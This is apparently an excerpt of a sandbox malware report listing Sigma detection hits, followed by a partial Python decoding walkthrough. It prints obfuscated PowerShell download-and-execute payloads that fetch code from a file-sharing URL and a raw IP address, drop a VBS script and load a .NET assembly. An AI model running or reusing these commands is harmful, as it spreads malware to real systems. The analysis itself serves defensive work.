          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", CommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6
Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, ProcessId: 2336, ProcessName: powershell.exe
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YW
RvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline", ProcessId: 2188, ProcessName: csc.exe
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs
          Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6248, TargetFilename: C:\Users\user\AppData\Local\Temp\w0uathue\w0uathue.cmdline
          Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'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'+[cHar]34+'))')))", CommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0E
          Source: Process started, Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
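Both PowerShell stages in the Sigma matches above can be recovered from the command lines the report prints. The Python below is an added worked example, not code from the sample or from Joe Sandbox. Its two inputs are copied from the report: the stage-1 base64 argument (the mshta.exe child) is truncated in the report, so only the visible prefix is decoded, and it turns out to be an Add-Type -MemberDefinition declaring urlmon's URLDownloadToFile, which is consistent with the same process (PID 6248) compiling w0uathue.cmdline with csc.exe. The stage-2 argument (the wscript.exe grandchild) is complete: single-quoted fragments are joined, three -replace operations turn Dfw into a quote, N9Y into a pipe and hGa into a dollar sign, and the result is piped to whatever $env:ComSpec[4,24,25] spells. The %ComSpec% value is an assumption about the analysis VM, and the payload fed to the loader re-implementation at the end is constructed, not the real filemail download.

```python
"""Recover the two PowerShell stages whose command lines this report prints.

Added example, not code from the sample or from Joe Sandbox. Both inputs are
copied from the report: the stage-1 base64 is truncated there, so only the
visible prefix is decoded; the stage-2 -command argument is complete. COMSPEC
is an assumed value for the analysis VM; the loader payload below is constructed.
"""
import base64
import re

# Stage 1 (mshta.exe -> powershell.exe): base64 prefix as printed in the report.
STAGE1_B64_PREFIX = (
    "JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBF"
    "ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdb"
    "RGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSld"
    "cHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBq"
    "bCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZ"
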